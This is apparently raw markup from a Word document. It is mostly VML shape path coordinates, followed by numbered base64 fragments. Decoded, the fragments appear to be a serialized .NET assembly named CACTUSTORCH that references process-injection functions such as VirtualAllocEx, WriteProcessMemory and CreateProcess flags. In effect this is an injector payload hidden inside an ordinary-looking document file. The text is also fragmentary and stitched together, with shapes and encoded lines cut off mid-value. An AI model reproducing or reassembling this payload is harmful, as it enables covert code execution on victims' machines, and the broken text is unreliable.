2875,14036,2875,14035,2875,14034,2875,14032,2875,14031,2875,14029,2875,14028,2875,14027,2875,14025,2875,14023,2875,14022,2875,14020,2875,14018,2875,14016,2875,14015,2875,14013,2875,14011,2875,14008,2875,14006,2875,14004,2875,14002,2875,14000,2875,13997,2875,13995,2875,13992,2875,13990,2875,13987,2875,13984,2875,13981,2875,13979,2875,13976,2875,13973,2875,13970,2875,13966,2875,13963,2875,13960,2875,13956,2875,13953,2875,13949,2875,13946,2875,13942,2875,13938,2875,13934,2875,13930,2875,13926,2875,13922,2875,13918,2875,13914,2875,13909,2875,13905,2875,13900,2875,13895,2875,13891,2875,13886,2875,13881,2875,13876,2875,13871,2875,13865,2875,13860,2875,13855,2875,13849,2875,13843,2875,13838,2875,13832,2875,13826,2875,13820,2875,13814,2875,13807,2875,13801e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:721.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,14430" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:14430;width:130;height:270" coordorigin="2370,14430" coordsize="130,270" path="m2395,14446l2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2395,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2396,14446,2397,14446,2397,14446,2397,14446,2397,14446,2397,14446,2398,14446,2398,14446,2398,14446,2398,14446,2399,14446,2399,14446,2399,14446,2399,14446,2400,14446,2400,14446,2400,14446,2401,14446,2401,14446,2402,14446,2402,14446,2403,14446,2403,14446,2404,14446,2404,14446,2405,14446,2405,14446,2406,14446,2406,14446,2407,14446,2408,14446,2408,14446,2409,14446,2410,14446,2411,14446,2411,14446,2412,14446,2413,14446,2414,14446,2415,14446,2416,14446,2417,14446,2418,14446,2419,14446,2420,14446,2421,14446,2422,14446,2423,14446,2424,14446,2425,14446,2426,14446,2428,14446,2429,14446,2430,14446,2432,14446,2433,14446,2434,14446,2436,14446,2437,14446,2439,14446,2441,14446,2442,14446,2444,14446,2445,14446,2447,14446,2449,14446,2451,14446,2453,14446,2454,14446,2456,14446,2458,14446,2460,14446,2462,14446,2464,14446,2466,14446,2469,14446,2471,14446,2473,14446,2475,14446,2478,14446,2480,14446,2482,14446,2485,14446,2487,14446,2490,14446,2493,14446,2495,14446,2498,14446,2501,14446,2504,14446,2506,14446,2509,14446,2512,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14446,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14447,2515,14448,2515,14448,2515,14448,2515,14448,2515,14449,2515,14449,2515,14449,2515,14450,2515,14450,2515,14450,2515,14451,2515,14451,2515,14452,2515,14452,2515,14453,2515,14453,2515,14454,2515,14455,2515,14455,2515,14456,2515,14457,2515,14457,2515,14458,2515,14459,2515,14460,2515,14461,2515,14462,2515,14463,2515,14464,2515,14465,2515,14466,2515,14468,2515,14469,2515,14470,2515,14471,2515,14473,2515,14474,2515,14476,2515,14477,2515,14479,2515,14481,2515,14482,2515,14484,2515,14486,2515,14488,2515,14490,2515,14492,2515,14494,2515,14496,2515,14498,2515,14500,2515,14503,2515,14505,2515,14508,2515,14510,2515,14513,2515,14515,2515,14518,2515,14521,2515,14524,2515,14527,2515,14530,2515,14533,2515,14536,2515,14539,2515,14543,2515,14546,2515,14549,2515,14553,2515,14557,2515,14560,2515,14564,2515,14568,2515,14572,2515,14576,2515,14580,2515,14584,2515,14589,2515,14593,2515,14598,2515,14602,2515,14607,2515,14612,2515,14617,2515,14622,2515,14627,2515,14632,2515,14637,2515,14642,2515,14648,2515,14653,2515,14659,2515,14665,2515,14671,2515,14677,2515,14683,2515,14689,2515,14695,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2515,14701,2514,14701,2514,14701,2514,14701,2514,14701,2514,14701,2514,14701,2514,14701,2513,14701,2513,14701,2513,14701,2513,14701,2512,14701,2512,14701,2512,14701,2512,14701,2511,14701,2511,14701,2511,14701,2510,14701,2510,14701,2510,14701,2509,14701,2509,14701,2508,14701,2508,14701,2507,14701,2507,14701,2506,14701,2506,14701,2505,14701,2505,14701,2504,14701,2503,14701,2503,14701,2502,14701,2501,14701,2501,14701,2500,14701,2499,14701,2498,14701,2497,14701,2497,14701,2496,14701,2495,14701,2494,14701,2493,14701,2492,14701,2491,14701,2490,14701,2489,14701,2488,14701,2486,14701,2485,14701,2484,14701,2483,14701,2481,14701,2480,14701,2479,14701,2477,14701,2476,14701,2475,14701,2473,14701,2472,14701,2470,14701,2468,14701,2467,14701,2465,14701,2463,14701,2462,14701,2460,14701,2458,14701,2456,14701,2454,14701,2452,14701,2450,14701,2448,14701,2446,14701,2444,14701,2442,14701,2440,14701,2437,14701,2435,14701,2433,14701,2430,14701,2428,14701,2426,14701,2423,14701,2420,14701,2418,14701,2415,14701,2412,14701,2410,14701,2407,14701,2404,14701,2401,14701,2398,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14700,2395,14700,2395,14700,2395,14700,2395,14700,2395,14699,2395,14699,2395,14699,2395,14698,2395,14698,2395,14698,2395,14697,2395,14697,2395,14696,2395,14696,2395,14695,2395,14695,2395,14694,2395,14694,2395,14693,2395,14692,2395,14692,2395,14691,2395,14690,2395,14689,2395,14689,2395,14688,2395,14687,2395,14686,2395,14685,2395,14684,2395,14682,2395,14681,2395,14680,2395,14679,2395,14678,2395,14676,2395,14675,2395,14673,2395,14672,2395,14670,2395,14669,2395,14667,2395,14665,2395,14664,2395,14662,2395,14660,2395,14658,2395,14656,2395,14654,2395,14652,2395,14649,2395,14647,2395,14645,2395,14643,2395,14640,2395,14638,2395,14635,2395,14632,2395,14630,2395,14627,2395,14624,2395,14621,2395,14618,2395,14615,2395,14612,2395,14608,2395,14605,2395,14602,2395,14598,2395,14595,2395,14591,2395,14587,2395,14584,2395,14580,2395,14576,2395,14572,2395,14567,2395,14563,2395,14559,2395,14555,2395,14550,2395,14545,2395,14541,2395,14536,2395,14531,2395,14526,2395,14521,2395,14516,2395,14511,2395,14505,2395,14500,2395,14494,2395,14489,2395,14483,2395,14477,2395,14471,2395,14465,2395,14459,2395,14453,2395,14446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:721.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,14430" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:14430;width:130;height:270" coordorigin="2850,14430" coordsize="130,270" path="m2875,14446l2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2877,14446,2877,14446,2877,14446,2877,14446,2877,14446,2877,14446,2878,14446,2878,14446,2878,14446,2878,14446,2879,14446,2879,14446,2879,14446,2879,14446,2880,14446,2880,14446,2880,14446,2881,14446,2881,14446,2882,14446,2882,14446,2882,14446,2883,14446,2883,14446,2884,14446,2884,14446,2885,14446,2885,14446,2886,14446,2887,14446,2887,14446,2888,14446,2889,14446,2889,14446,2890,14446,2891,14446,2892,14446,2892,14446,2893,14446,2894,14446,2895,14446,2896,14446,2897,14446,2898,14446,2899,14446,2900,14446,2901,14446,2902,14446,2903,14446,2904,14446,2906,14446,2907,14446,2908,14446,2909,14446,2911,14446,2912,14446,2913,14446,2915,14446,2916,14446,2918,14446,2919,14446,2921,14446,2922,14446,2924,14446,2926,14446,2927,14446,2929,14446,2931,14446,2933,14446,2935,14446,2937,14446,2938,14446,2940,14446,2943,14446,2945,14446,2947,14446,2949,14446,2951,14446,2953,14446,2956,14446,2958,14446,2960,14446,2963,14446,2965,14446,2968,14446,2970,14446,2973,14446,2976,14446,2978,14446,2981,14446,2984,14446,2987,14446,2990,14446,2993,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14448,2996,14448,2996,14448,2996,14448,2996,14449,2996,14449,2996,14449,2996,14450,2996,14450,2996,14450,2996,14451,2996,14451,2996,14452,2996,14452,2996,14453,2996,14453,2996,14454,2996,14455,2996,14455,2996,14456,2996,14457,2996,14457,2996,14458,2996,14459,2996,14460,2996,14461,2996,14462,2996,14463,2996,14464,2996,14465,2996,14466,2996,14468,2996,14469,2996,14470,2996,14471,2996,14473,2996,14474,2996,14476,2996,14477,2996,14479,2996,14481,2996,14482,2996,14484,2996,14486,2996,14488,2996,14490,2996,14492,2996,14494,2996,14496,2996,14498,2996,14500,2996,14503,2996,14505,2996,14508,2996,14510,2996,14513,2996,14515,2996,14518,2996,14521,2996,14524,2996,14527,2996,14530,2996,14533,2996,14536,2996,14539,2996,14543,2996,14546,2996,14549,2996,14553,2996,14557,2996,14560,2996,14564,2996,14568,2996,14572,2996,14576,2996,14580,2996,14584,2996,14589,2996,14593,2996,14598,2996,14602,2996,14607,2996,14612,2996,14617,2996,14622,2996,14627,2996,14632,2996,14637,2996,14642,2996,14648,2996,14653,2996,14659,2996,14665,2996,14671,2996,14677,2996,14683,2996,14689,2996,14695,2996,14701,2996,14701,2996,14701,2996,14701,2996,14701,2996,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2994,14701,2994,14701,2994,14701,2994,14701,2994,14701,2994,14701,2993,14701,2993,14701,2993,14701,2993,14701,2992,14701,2992,14701,2992,14701,2992,14701,2991,14701,2991,14701,2991,14701,2990,14701,2990,14701,2989,14701,2989,14701,2989,14701,2988,14701,2988,14701,2987,14701,2987,14701,2986,14701,2985,14701,2985,14701,2984,14701,2984,14701,2983,14701,2982,14701,2982,14701,2981,14701,2980,14701,2979,14701,2979,14701,2978,14701,2977,14701,2976,14701,2975,14701,2974,14701,2973,14701,2972,14701,2971,14701,2970,14701,2969,14701,2968,14701,2967,14701,2965,14701,2964,14701,2963,14701,2962,14701,2960,14701,2959,14701,2958,14701,2956,14701,2955,14701,2953,14701,2952,14701,2950,14701,2949,14701,2947,14701,2945,14701,2944,14701,2942,14701,2940,14701,2938,14701,2936,14701,2934,14701,2932,14701,2930,14701,2928,14701,2926,14701,2924,14701,2922,14701,2920,14701,2918,14701,2915,14701,2913,14701,2911,14701,2908,14701,2906,14701,2903,14701,2901,14701,2898,14701,2895,14701,2893,14701,2890,14701,2887,14701,2884,14701,2881,14701,2878,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14700,2875,14700,2875,14700,2875,14700,2875,14700,2875,14699,2875,14699,2875,14699,2875,14698,2875,14698,2875,14698,2875,14697,2875,14697,2875,14696,2875,14696,2875,14695,2875,14695,2875,14694,2875,14694,2875,14693,2875,14692,2875,14692,2875,14691,2875,14690,2875,14689,2875,14689,2875,14688,2875,14687,2875,14686,2875,14685,2875,14684,2875,14682,2875,14681,2875,14680,2875,14679,2875,14678,2875,14676,2875,14675,2875,14673,2875,14672,2875,14670,2875,14669,2875,14667,2875,14665,2875,14664,2875,14662,2875,14660,2875,14658,2875,14656,2875,14654,2875,14652,2875,14649,2875,14647,2875,14645,2875,14643,2875,14640,2875,14638,2875,14635,2875,14632,2875,14630,2875,14627,2875,14624,2875,14621,2875,14618,2875,14615,2875,14612,2875,14608,2875,14605,2875,14602,2875,14598,2875,14595,2875,14591,2875,14587,2875,14584,2875,14580,2875,14576,2875,14572,2875,14567,2875,14563,2875,14559,2875,14555,2875,14550,2875,14545,2875,14541,2875,14536,2875,14531,2875,14526,2875,14521,2875,14516,2875,14511,2875,14505,2875,14500,2875,14494,2875,14489,2875,14483,2875,14477,2875,14471,2875,14465,2875,14459,2875,14453,2875,14446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:15050;width:130;height:270" coordorigin="2370,15050" coordsize="130,270" path="m2395,15077l2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2397,15077,2397,15077,2397,15077,2397,15077,2397,15077,2398,15077,2398,15077,2398,15077,2398,15077,2399,15077,2399,15077,2399,15077,2399,15077,2400,15077,2400,15077,2400,15077,2401,15077,2401,15077,2402,15077,2402,15077,2403,15077,2403,15077,2404,15077,2404,15077,2405,15077,2405,15077,2406,15077,2406,15077,2407,15077,2408,15077,2408,15077,2409,15077,2410,15077,2411,15077,2411,15077,2412,15077,2413,15077,2414,15077,2415,15077,2416,15077,2417,15077,2418,15077,2419,15077,2420,15077,2421,15077,2422,15077,2423,15077,2424,15077,2425,15077,2426,15077,2428,15077,2429,15077,2430,15077,2432,15077,2433,15077,2434,15077,2436,15077,2437,15077,2439,15077,2441,15077,2442,15077,2444,15077,2445,15077,2447,15077,2449,15077,2451,15077,2453,15077,2454,15077,2456,15077,2458,15077,2460,15077,2462,15077,2464,15077,2466,15077,2469,15077,2471,15077,2473,15077,2475,15077,2478,15077,2480,15077,2482,15077,2485,15077,2487,15077,2490,15077,2493,15077,2495,15077,2498,15077,2501,15077,2504,15077,2506,15077,2509,15077,2512,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15078,2515,15078,2515,15078,2515,15078,2515,15078,2515,15079,2515,15079,2515,15079,2515,15080,2515,15080,2515,15080,2515,15081,2515,15081,2515,15082,2515,15082,2515,15083,2515,15083,2515,15084,2515,15084,2515,15085,2515,15086,2515,15086,2515,15087,2515,15088,2515,15089,2515,15089,2515,15090,2515,15091,2515,15092,2515,15093,2515,15094,2515,15096,2515,15097,2515,15098,2515,15099,2515,15100,2515,15102,2515,15103,2515,15105,2515,15106,2515,15108,2515,15109,2515,15111,2515,15113,2515,15114,2515,15116,2515,15118,2515,15120,2515,15122,2515,15124,2515,15126,2515,15129,2515,15131,2515,15133,2515,15135,2515,15138,2515,15140,2515,15143,2515,15146,2515,15148,2515,15151,2515,15154,2515,15157,2515,15160,2515,15163,2515,15166,2515,15170,2515,15173,2515,15176,2515,15180,2515,15183,2515,15187,2515,15191,2515,15194,2515,15198,2515,15202,2515,15206,2515,15211,2515,15215,2515,15219,2515,15223,2515,15228,2515,15233,2515,15237,2515,15242,2515,15247,2515,15252,2515,15257,2515,15262,2515,15267,2515,15273,2515,15278,2515,15284,2515,15289,2515,15295,2515,15301,2515,15307,2515,15313,2515,15319,2515,15325,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2513,15332,2513,15332,2513,15332,2513,15332,2512,15332,2512,15332,2512,15332,2512,15332,2511,15332,2511,15332,2511,15332,2510,15332,2510,15332,2510,15332,2509,15332,2509,15332,2508,15332,2508,15332,2507,15332,2507,15332,2506,15332,2506,15332,2505,15332,2505,15332,2504,15332,2503,15332,2503,15332,2502,15332,2501,15332,2501,15332,2500,15332,2499,15332,2498,15332,2497,15332,2497,15332,2496,15332,2495,15332,2494,15332,2493,15332,2492,15332,2491,15332,2490,15332,2489,15332,2488,15332,2486,15332,2485,15332,2484,15332,2483,15332,2481,15332,2480,15332,2479,15332,2477,15332,2476,15332,2475,15332,2473,15332,2472,15332,2470,15332,2468,15332,2467,15332,2465,15332,2463,15332,2462,15332,2460,15332,2458,15332,2456,15332,2454,15332,2452,15332,2450,15332,2448,15332,2446,15332,2444,15332,2442,15332,2440,15332,2437,15332,2435,15332,2433,15332,2430,15332,2428,15332,2426,15332,2423,15332,2420,15332,2418,15332,2415,15332,2412,15332,2410,15332,2407,15332,2404,15332,2401,15332,2398,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15330,2395,15330,2395,15330,2395,15330,2395,15329,2395,15329,2395,15329,2395,15328,2395,15328,2395,15328,2395,15327,2395,15327,2395,15326,2395,15326,2395,15325,2395,15325,2395,15324,2395,15323,2395,15323,2395,15322,2395,15321,2395,15321,2395,15320,2395,15319,2395,15318,2395,15317,2395,15316,2395,15315,2395,15314,2395,15313,2395,15312,2395,15310,2395,15309,2395,15308,2395,15307,2395,15305,2395,15304,2395,15302,2395,15301,2395,15299,2395,15297,2395,15296,2395,15294,2395,15292,2395,15290,2395,15288,2395,15286,2395,15284,2395,15282,2395,15280,2395,15278,2395,15275,2395,15273,2395,15270,2395,15268,2395,15265,2395,15263,2395,15260,2395,15257,2395,15254,2395,15251,2395,15248,2395,15245,2395,15242,2395,15239,2395,15235,2395,15232,2395,15229,2395,15225,2395,15221,2395,15218,2395,15214,2395,15210,2395,15206,2395,15202,2395,15198,2395,15194,2395,15189,2395,15185,2395,15180,2395,15176,2395,15171,2395,15166,2395,15161,2395,15156,2395,15151,2395,15146,2395,15141,2395,15136,2395,15130,2395,15125,2395,15119,2395,15113,2395,15107,2395,15101,2395,15095,2395,15089,2395,15083,2395,15077e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:15050;width:130;height:270" coordorigin="2850,15050" coordsize="130,270" path="m2875,15077l2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2877,15077,2877,15077,2877,15077,2877,15077,2877,15077,2877,15077,2878,15077,2878,15077,2878,15077,2878,15077,2879,15077,2879,15077,2879,15077,2879,15077,2880,15077,2880,15077,2880,15077,2881,15077,2881,15077,2882,15077,2882,15077,2882,15077,2883,15077,2883,15077,2884,15077,2884,15077,2885,15077,2885,15077,2886,15077,2887,15077,2887,15077,2888,15077,2889,15077,2889,15077,2890,15077,2891,15077,2892,15077,2892,15077,2893,15077,2894,15077,2895,15077,2896,15077,2897,15077,2898,15077,2899,15077,2900,15077,2901,15077,2902,15077,2903,15077,2904,15077,2906,15077,2907,15077,2908,15077,2909,15077,2911,15077,2912,15077,2913,15077,2915,15077,2916,15077,2918,15077,2919,15077,2921,15077,2922,15077,2924,15077,2926,15077,2927,15077,2929,15077,2931,15077,2933,15077,2935,15077,2937,15077,2938,15077,2940,15077,2943,15077,2945,15077,2947,15077,2949,15077,2951,15077,2953,15077,2956,15077,2958,15077,2960,15077,2963,15077,2965,15077,2968,15077,2970,15077,2973,15077,2976,15077,2978,15077,2981,15077,2984,15077,2987,15077,2990,15077,2993,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15078,2996,15078,2996,15078,2996,15078,2996,15078,2996,15079,2996,15079,2996,15079,2996,15080,2996,15080,2996,15080,2996,15081,2996,15081,2996,15082,2996,15082,2996,15083,2996,15083,2996,15084,2996,15084,2996,15085,2996,15086,2996,15086,2996,15087,2996,15088,2996,15089,2996,15089,2996,15090,2996,15091,2996,15092,2996,15093,2996,15094,2996,15096,2996,15097,2996,15098,2996,15099,2996,15100,2996,15102,2996,15103,2996,15105,2996,15106,2996,15108,2996,15109,2996,15111,2996,15113,2996,15114,2996,15116,2996,15118,2996,15120,2996,15122,2996,15124,2996,15126,2996,15129,2996,15131,2996,15133,2996,15135,2996,15138,2996,15140,2996,15143,2996,15146,2996,15148,2996,15151,2996,15154,2996,15157,2996,15160,2996,15163,2996,15166,2996,15170,2996,15173,2996,15176,2996,15180,2996,15183,2996,15187,2996,15191,2996,15194,2996,15198,2996,15202,2996,15206,2996,15211,2996,15215,2996,15219,2996,15223,2996,15228,2996,15233,2996,15237,2996,15242,2996,15247,2996,15252,2996,15257,2996,15262,2996,15267,2996,15273,2996,15278,2996,15284,2996,15289,2996,15295,2996,15301,2996,15307,2996,15313,2996,15319,2996,15325,2996,15332,2996,15332,2996,15332,2996,15332,2996,15332,2996,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2994,15332,2994,15332,2994,15332,2994,15332,2994,15332,2994,15332,2993,15332,2993,15332,2993,15332,2993,15332,2992,15332,2992,15332,2992,15332,2992,15332,2991,15332,2991,15332,2991,15332,2990,15332,2990,15332,2989,15332,2989,15332,2989,15332,2988,15332,2988,15332,2987,15332,2987,15332,2986,15332,2985,15332,2985,15332,2984,15332,2984,15332,2983,15332,2982,15332,2982,15332,2981,15332,2980,15332,2979,15332,2979,15332,2978,15332,2977,15332,2976,15332,2975,15332,2974,15332,2973,15332,2972,15332,2971,15332,2970,15332,2969,15332,2968,15332,2967,15332,2965,15332,2964,15332,2963,15332,2962,15332,2960,15332,2959,15332,2958,15332,2956,15332,2955,15332,2953,15332,2952,15332,2950,15332,2949,15332,2947,15332,2945,15332,2944,15332,2942,15332,2940,15332,2938,15332,2936,15332,2934,15332,2932,15332,2930,15332,2928,15332,2926,15332,2924,15332,2922,15332,2920,15332,2918,15332,2915,15332,2913,15332,2911,15332,2908,15332,2906,15332,2903,15332,2901,15332,2898,15332,2895,15332,2893,15332,2890,15332,2887,15332,2884,15332,2881,15332,2878,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15330,2875,15330,2875,15330,2875,15330,2875,15329,2875,15329,2875,15329,2875,15328,2875,15328,2875,15328,2875,15327,2875,15327,2875,15326,2875,15326,2875,15325,2875,15325,2875,15324,2875,15323,2875,15323,2875,15322,2875,15321,2875,15321,2875,15320,2875,15319,2875,15318,2875,15317,2875,15316,2875,15315,2875,15314,2875,15313,2875,15312,2875,15310,2875,15309,2875,15308,2875,15307,2875,15305,2875,15304,2875,15302,2875,15301,2875,15299,2875,15297,2875,15296,2875,15294,2875,15292,2875,15290,2875,15288,2875,15286,2875,15284,2875,15282,2875,15280,2875,15278,2875,15275,2875,15273,2875,15270,2875,15268,2875,15265,2875,15263,2875,15260,2875,15257,2875,15254,2875,15251,2875,15248,2875,15245,2875,15242,2875,15239,2875,15235,2875,15232,2875,15229,2875,15225,2875,15221,2875,15218,2875,15214,2875,15210,2875,15206,2875,15202,2875,15198,2875,15194,2875,15189,2875,15185,2875,15180,2875,15176,2875,15171,2875,15166,2875,15161,2875,15156,2875,15151,2875,15146,2875,15141,2875,15136,2875,15130,2875,15125,2875,15119,2875,15113,2875,15107,2875,15101,2875,15095,2875,15089,2875,15083,2875,15077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86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133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"ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2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aWNl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cwBEZWJ1Z2dp"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134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"bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxw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UHJv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Y2Vzc0F0dHJp"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135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"YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVh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dGVQ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cm9jZXNzRmxh"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136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"Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZ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Q291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bnRDaGFycwBU"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137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"ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRy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ZXNz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AGxwU3RhcnRB"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138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"ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQA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Q29u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dmVydABoU3Rk"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139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"SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABi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aW5h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cnkAV3JpdGVQ"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140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"cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBv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cF9J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bmVxdWFsaXR5"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141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"AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQBy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AAAV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XABTAHkAcwBX"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142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"AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLq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xE+a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SSAzLsphXgAE"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143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"IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUO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BAAB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Dg4DIAAIBgAD"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144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"Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAA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AAQI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AAAABBAAAAAE"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145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"IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAE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AEAA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AAQAgAAABAAA"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146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"AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAA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AAgE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AAAAEAQAAAAg"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147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"BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESAD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BhEk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EwAKGA4OEgwS"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148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"DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJ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GBgJ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GAUgAgEODggB"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149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"AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAA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AAAQ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AQALQ0FDVFVT"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150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"VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5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Mi1h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ZjMzN2FiZTU3"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151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"NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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152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"AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8l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ACAA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EAAAAAAAAAAA"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153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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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154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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAA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AAAAAAAAAAAA"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155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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAA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AAAA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AAAAAAEAAQAA"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842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
